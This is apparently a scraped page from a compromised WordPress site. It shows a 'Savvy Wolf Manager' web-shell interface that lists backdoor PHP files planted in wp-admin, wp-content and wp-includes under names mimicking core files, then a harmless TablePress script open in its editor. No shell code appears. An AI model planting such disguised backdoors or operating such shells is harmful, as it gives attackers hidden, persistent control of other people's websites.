Backups Created:
/home/falconag/public_html/wp-admin/admin-wolf.php
/home/falconag/public_html/wp-content/edit-wolf.php
/home/falconag/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: add.js
/** * JavaScript code for the "Add New" screen. * * @package TablePress * @subpackage Views JavaScript * @author Tobias Bäthge * @since 3.0.0 */ /** * Internal dependencies. */ import { initializeReactComponent } from './common/react-loader'; import Screen from './add/screen'; initializeReactComponent( 'tablepress-add-screen', <Screen /> );